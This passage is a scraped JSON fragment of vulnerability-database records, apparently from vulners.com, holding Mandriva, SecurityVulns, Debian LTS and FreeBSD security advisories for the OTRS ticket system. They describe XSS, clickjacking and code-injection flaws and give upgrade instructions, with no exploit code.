cf451c6dc24d227df81f277d0542cb9e mbs1/SRPMS/otrs-3.2.15-1.mbs1.src.rpm\r\n _______________________________________________________________________\r\n\r\n To upgrade automatically use MandrivaUpdate or urpmi. The verification\r\n of md5 checksums and GPG signatures is performed automatically for you.\r\n\r\n All packages are signed by Mandriva for security. You can obtain the\r\n GPG public key of the Mandriva Security Team by executing:\r\n\r\n gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98\r\n\r\n You can view other update advisories for Mandriva Linux at:\r\n\r\n http://www.mandriva.com/en/support/security/advisories/\r\n\r\n If you want to report vulnerabilities, please contact\r\n\r\n security_(at)_mandriva.com\r\n _______________________________________________________________________\r\n\r\n Type Bits/KeyID Date User ID\r\n pub 1024D/22458A98 2000-07-10 Mandriva Security Team\r\n <security*mandriva.com>\r\n-----BEGIN PGP SIGNATURE-----\r\nVersion: GnuPG v1.4.12 (GNU/Linux)\r\n\r\niD8DBQFTIWA2mqjQ0CJFipgRAmAyAJ4soLFUh+CytH8YdDnszYsa26wzjwCghyCb\r\nIuQkiqLATAUUnFETQnEXFjk=\r\n=t1Xt\r\n-----END PGP SIGNATURE-----\r\n\r\n", "edition": 1, "modified": "2014-05-05T00:00:00", "published": "2014-05-05T00:00:00", "id": "SECURITYVULNS:DOC:30637", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:30637", "title": "[ MDVSA-2014:054 ] otrs", "type": "securityvulns", "cvss": {"score": 4.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:NONE/I:PARTIAL/A:NONE/"}}, {"lastseen": "2018-08-31T11:09:55", "bulletinFamily": "software", "cvelist": ["CVE-2013-6233", "CVE-2013-6231", "CVE-2014-2655", "CVE-2013-6429", "CVE-2012-2983", "CVE-2014-1879", "CVE-2014-1888", "CVE-2014-0053", "CVE-2014-2244", "CVE-2014-1206", "CVE-2014-1454", "CVE-2013-4152", "CVE-2014-2685", "CVE-2014-1216", "CVE-2014-2327", "CVE-2014-1224", "CVE-2014-2570", "CVE-2014-0097", "CVE-2014-2279", "CVE-2014-2332", "CVE-2014-1695", "CVE-2014-2280", "CVE-2014-2242", "CVE-2014-0054", "CVE-2012-2981", "CVE-2014-2330", "CVE-2014-2043", "CVE-2013-7106", "CVE-2012-2982", "CVE-2014-2682", "CVE-2014-1610", "CVE-2013-6453", "CVE-2013-6234", "CVE-2013-4568", "CVE-2013-6472", "CVE-2013-5951", "CVE-2014-2243", "CVE-2012-4893", "CVE-2014-2035", "CVE-2014-2040", "CVE-2014-2331", "CVE-2013-7196", "CVE-2013-7195", "CVE-2013-6452", "CVE-2014-2531", "CVE-2014-2329", "CVE-2014-1471", "CVE-2014-2684", "CVE-2013-6232", "CVE-2014-2326", "CVE-2014-1904", "CVE-2013-6451", "CVE-2014-1455", "CVE-2014-2278", "CVE-2014-1223", "CVE-2014-1222", "CVE-2014-1889", "CVE-2014-1694", "CVE-2013-7108", "CVE-2014-2683", "CVE-2014-2328", "CVE-2014-2681"], "description": "PHP inclusions, SQL injections, directory traversals, crossite scripting, information leaks, etc.", "edition": 1, "modified": "2014-05-05T00:00:00", "published": "2014-05-05T00:00:00", "id": "SECURITYVULNS:VULN:13733", "href": "https://vulners.com/securityvulns/SECURITYVULNS:VULN:13733", "title": "Web applications security vulnerabilities summary (PHP, ASP, JSP, CGI, Perl)", "type": "securityvulns", "cvss": {"score": 8.5, "vector": "AV:NETWORK/AC:MEDIUM/Au:SINGLE_INSTANCE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "debian": [{"lastseen": "2019-05-30T02:22:41", "bulletinFamily": "unix", "cvelist": ["CVE-2014-2554", "CVE-2014-1695", "CVE-2017-14635", "CVE-2014-2553"], "description": "Package : otrs2\nVersion : 3.3.18-1~deb7u1\nCVE ID : CVE-2014-1695 CVE-2014-2553 CVE-2014-2554\n CVE-2017-14635\nDebian Bug : 876462\n\nAn attacker who is logged into OTRS, a Ticket Request System, as an\nagent with write permissions for statistics can inject arbitrary code\ninto the system. This can lead to serious problems like privilege\nescalation, data loss, and denial of service. This issue is also known\nas CVE-2017-14635 and is resolved by upgrading to the latest upstream\nrelease of OTRS3.\n\n****IMPORTANT UPGRADE NOTES****\n===============================\n\nThis update requires manual intervention. We strongly recommend to\nbackup all files and databases before upgrading. If you use the MySQL\nbackend you should read Debian bug report #707075 and the included\nREADME.Debian file which will provide further information.\n\nIf you discover that the maintenance mode is still activated after the\nupdate, we recommend to remove /etc/otrs/maintenance.html and\n/var/lib/otrs/httpd/htdocs/maintenance.html which will resolve the issue\n.\n\nIn addition the following security vulnerabilities were also addressed:\n\nCVE-2014-1695\n Cross-site scripting (XSS) vulnerability in OTRS allows remote\n attackers to inject arbitrary web script or HTML via a crafted HTML\n email\n\nCVE-2014-2553\n Cross-site scripting (XSS) vulnerability in OTRS allows remote\n authenticated users to inject arbitrary web script or HTML via\n vectors related to dynamic fields\n\nCVE-2014-2554\n OTRS allows remote attackers to conduct clickjacking attacks via an\n IFRAME element\n\nFor Debian 7 "Wheezy", these problems have been fixed in version\n3.3.18-1~deb7u1.\n\nWe recommend that you upgrade your otrs2 packages.\n\nFurther information about Debian LTS security advisories, how to apply\nthese updates to your system and frequently asked questions can be\nfound at: https://wiki.debian.org/LTS\n", "edition": 3, "modified": "2017-09-30T19:36:15", "published": "2017-09-30T19:36:15", "id": "DEBIAN:DLA-1119-1:89666", "href": "https://lists.debian.org/debian-lts-announce/2017/debian-lts-announce-201709/msg00036.html", "title": "[SECURITY] [DLA 1119-1] otrs2 security update", "type": "debian", "cvss": {"score": 6.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:P"}}]}

FreeBSD : otrs -- XSS Issue (70b72a52-9e54-11e3-babe-60a44c524f57)

Description

The OTRS Project reports : An attacker could send a specially prepared HTML email to OTRS. If he can then trick an agent into following a special link to display this email, JavaScript code would be executed.

The OTRS Project reports :

An attacker could send a specially prepared HTML email to OTRS. If he can then trick an agent into following a special link to display this email, JavaScript code would be executed.